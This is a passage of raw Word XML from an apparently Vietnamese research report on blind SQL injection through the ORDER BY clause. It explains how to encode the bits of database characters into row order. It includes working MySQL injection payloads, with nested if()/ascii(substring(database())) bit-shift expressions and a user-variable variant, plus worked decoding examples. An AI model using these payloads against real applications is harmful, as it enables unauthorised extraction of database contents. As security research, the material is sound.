        </w:rPr>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#Nếu mã ASCII ký tự đầu tiên không phải là 2, tiếp tục đến 3. Làm tương tự đến hết 120</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>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r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) # Đóng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phía kẻ tấn công, sẽ thực hiện phân tích thứ tự dữ liệu trả về, so sánh với bảng tra cứu giữa vị trí và mã của ký tự để trích xuất ra được ký tự mong muốn. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp này cho phép chỉ một lần yêu cầu có thể lấy về được ít nhất 1 ký tự, nếu như có từ 5 dòng trả về trở lên. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tuy nhiên, như đã thấy, phương pháp này tạo ra một câu lệnh truy vấn khá là dài. Một phương pháp khác là áp dụng kỹ thuật dịch bit ở trên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một ký tự khi chuyển sang ASCII rồi hệ phân có thể biểu diễn bằng 7 ký tự. Xếp 7 ký tự tương ứng với vị trí của 7 row trả về, lần lượt từ 1 đến 7. Nếu như có thể làm thế nào đó để mỗi row có thể hiển thị trạng thái của bit tương ứng thì sẽ lấy được giá trị của ký tự cần tìm. Lúc này, mỗi bit sẽ có thể 1 trong 2 trường hợp: 0 hoặc 1. Vậy làm thế nào để row có thể hiển thị được 0/1 theo bit tương ứng ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="004C204C">
      <w:r w:rsidRPr="005D3C52">
        <w:t>Phương pháp ở đây là: Lấy dòng có id là 1 làm mốc và các bit từ 0 đến 6. Lần lượt thực hiện phép dịch phải bit từ 0 đến 6 để lấy từng bit một (từ phải qua trái, bit thấp đến bit cao). Vì số id đến từ 1, và mất một dòng làm mốc (id=1) nên để số bit cần dịch sẽ là (id-2). Nếu bit đó là 0, sắp xếp sao cho ở trước row có id là 1, nếu bit đó là 1, sắp xếp sao cho ở sau row có id là 1. Khi thực hiện phân tích thứ tự trả về, nếu thấy dòng n xuất hiện trước dòng 1, thì bit (n-2) từ phải sang là 0, còn xuất hiện sau dòng 1 thì bit (n-2) từ phải sang là 1, đây chính là giá trị Return (r) . Mã ASCII của ký tự là: ∑2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>(n-2)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>*r.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0410" w:rsidRDefault="00891990" w:rsidP="00555D31">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6646ADE4" wp14:editId="4089E709">
            <wp:extent cx="5494392" cy="3692105"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="Picture 49" descr="luocd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cdo_1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect l="5013" t="5918" r="3221" b="6735"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5494392" cy="3692105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FC785D">
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Để làm cho dòng đó xuất hiện trước/sau dòng 1 có thể sử dụng một cách đơn giản là: biểu thức trả về 0 nếu bit đó là 0, trả về 2 nếu bit đó là 1, đối với row có id là 1 thì trả về 1. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sẽ có bảng tương ứng:</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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FC785D">
      <w:r w:rsidRPr="005D3C52">
        <w:t>Thứ tự sau khi sắp xếp (theo tăn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">g dần) sẽ là:  3 4 5 6 7 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 2 8. Phân tích kết quả trả về, thấy row 2 và 8 ở sau 1 nên bit 0 và 6 sẽ là 1, các bit còn lại là 0. Do đó mã nhị phân của ký tự đó sẽ là:, tương ứng với giá trị A. Mã tấn công của phương pháp có thể được xây dựng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>If(id&lt;9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Chỉ lấy id từ 1 đến 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if(id=1,1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Nếu id là 1, trả về 1, nếu không thực hiện dịch bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>If((((ascii(substring(database(),1,1))) &gt;&gt; (id-2)) mod 2)=1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Nếu bit là 1, trả về 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Nếu bit là 1, trả về 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Lớn hơn 8 trả về 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thử nghiệm với bảng ví dụ ở trên:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05710AA2" wp14:editId="5CB18B78">
            <wp:extent cx="6532063" cy="192405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40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6556633" cy="1931287"/>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102" w:name="_Toc458436433"/>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21</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Áp dụng lấy ký tự đầu tiên trong tên CSDL.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00642451">
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Thứ tự sắp xếp là: 4 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 8 7 6 3 2. Cho vào bảng ánh xạ</w:t>
      </w:r>
      <w:r w:rsidR="00FC785D">
        <w:t>:</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115</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00642451">
      <w:r w:rsidRPr="005D3C52">
        <w:t>Vậy ký tự cần tìm có mã nhị phân: 1110011 tương ứng với mã 115 trong bảng mã ASCII, là ký t</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>ự ‘s’.Như vậy với một lần gửi yêu cầu có thể lấy được một ký tự. Phương pháp này đòi hỏi phải có tối thiểu 8 row trả về, nhiều hơn so với phương pháp ở trên (5 row). Tuy nhiên, cách thức triển khai của phương pháp này đơn giản, dễ dàng hơn phương pháp ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FF02A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc459374344"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giới hạn của phương pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00642451">
      <w:r w:rsidRPr="005D3C52">
        <w:t>Như đã biết, phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu đòi hỏi phải có tối thiểu 8 row trả về trong kết quả. Ngoài ra, khi áp dụng vào quá trình tấn công thực tế sẽ gặp một số vấn đề là: phải có cột id, và giá trị của cột id này phải tăng dần liên tục: Ý tưởng chính của phương pháp dựa vào cột id có giá trị tăng dần liên tiếp. Trong nhiều trường hợp cụ thể, sẽ không có cột id này, hoặc đơn giản là sẽ không biết tên cột, giá trị các id trả về không liên tục. Để khắc phục vấn đề này cần sử dụng một biến của DBMS thay thế cho id. G</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>iá trị của biến này sẽ tăng dần qua mỗi dòng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Sử dụng biến nên cần select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Tăng dần giá trị của biến qua mỗi lần duyệt dòng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if((@hbn:=@hbn+1)&lt;9,if(@hbn=1,1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Phương pháp tương tự như trên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">if((((ascii(substring(database(),1,1))) &gt;&gt; (@hbn-2)) mod 2)=1,2,0)),3) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Khởi tạo biến @hbn bằng 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>from  (select @hbn:=0) as t)</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2240514A" wp14:editId="187B3D6E">
            <wp:extent cx="5268596" cy="25146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41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5275555" cy="2517921"/>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104" w:name="_Toc458436434"/>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22</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Sử dụng biến, thay thế sử dụng cột id</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00FF02A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc459374345"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mở rộng</w:t>
      </w:r>
      <w:r w:rsidR="00FF02A4" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00EB02CD">
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Phương pháp có thể mở rộng theo 02 hướng. Hướng mở rộng </w:t>
      </w:r>
      <w:r w:rsidR="002D3C6B" w:rsidRPr="005D3C52">
        <w:t>đầu tiên</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> là lấy nhiều hơn 1 ký tự trong một lần yêu cầu. Để lấy 1 ký tự sẽ cần 7 dòng (cho 7 bit) và 1 dòng làm mốc. Ở ký tự thứ hai chỉ cần them 7 dòng để hiển thị 7 bit tiếp theo. Với m số ký tự cần lấy, thì số dòng cần để hiển thị là 7*m+1. Ví dụ sau sẽ lấy 02 ký tự trong một yêu cầu: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4AF06B9E" wp14:editId="045D7142">
            <wp:extent cx="5686107" cy="391477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42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5692507" cy="3919182"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="004F69FA" w:rsidP="004F69FA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc458436435"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lấy nhiều hơn một ký tự trong một yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00EB02CD">
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Đối với 7 cột đầu tiên (từ 2 đến 8), có 4 và 5 xuất hiện trước cột 1 nên thứ tự bit của ký tự đầu tiên là: 4 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 2 3 4 7. Tương tự ở trên, ký tự đầu tiên là ‘s’. Đối với 7 cột tiếp theo (từ 9 đến 15), có 10 11 12 xuất hiện trước 1 nên thứ tự bit của ký tự thứ hai là: 10 11 12 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 9 13 14 15, cho vào bảng ánh xạ:</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 xml:space="preserve">Row </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>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9</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15</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(n-9)</w:t>
            </w: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tc>
          <w:tcPr>
            <w:tcW w:w="98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113</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00EB02CD">
      <w:r w:rsidRPr="005D3C52">
        <w:t>Mã ASCI của ký tự là 113, tương ứng với ký tự ‘q’. Lưu ý là số bit cần dịch sẽ là n-9 vì phải trừ them 7 bit cho ký tự đầu tiên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D665C" w:rsidRDefault="002D3C6B" w:rsidP="00EB02CD">
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Một là hướng khác là mở rộng sang các tấn công Blind SQL injection truyền thống. Vì mệnh đề ORDER BY nằm sau mệnh đề WHERE, là mệnh đề thường xuyên mắc lỗi SQL injection nên hoàn toàn có thể áp dụng phương pháp này. Chỉ cần kết quả trả có </w:t>
      </w:r>
      <w:r w:rsidR="001D665C">
        <w:t xml:space="preserve">từ </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>8 dòng trở lên</w:t>
      </w:r>
      <w:r w:rsidR="001D665C">
